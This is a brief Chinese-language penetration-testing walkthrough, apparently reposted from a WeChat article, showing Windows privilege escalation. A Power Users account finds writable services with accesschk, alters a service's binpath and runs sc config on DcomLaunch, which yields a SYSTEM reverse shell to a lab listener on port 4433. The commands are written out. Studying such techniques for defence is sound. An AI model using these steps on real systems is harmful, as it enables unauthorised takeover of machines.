用户test隶属于Power User组, 登入系统,IP为192.168.60.23,监听服务IP地址为192.168.60.19
用到的工具:工具:accesschk
执行accesschk.exe -uwcqv "Power Users" * 获取可以操作的服务名称信息; sc qc kdc查询kdc服务详细信息
查看系统启动的服务
修改参数binpath的值
执行sc config DcomLaunch obj= ".\LocalSystem" password= ""在重新启动DcomLaunch,在192.168.60.19监听的4433端口成功获取反弹,系统权限
你可能喜欢
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650456850&idx=3&sn=2d808a8266618a82889961665f78597f&chksm=83bba6f6b4cc2fe036978c627a8b79cb282dd428a9c96a674595d75646a2bf00f449e167e36d#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh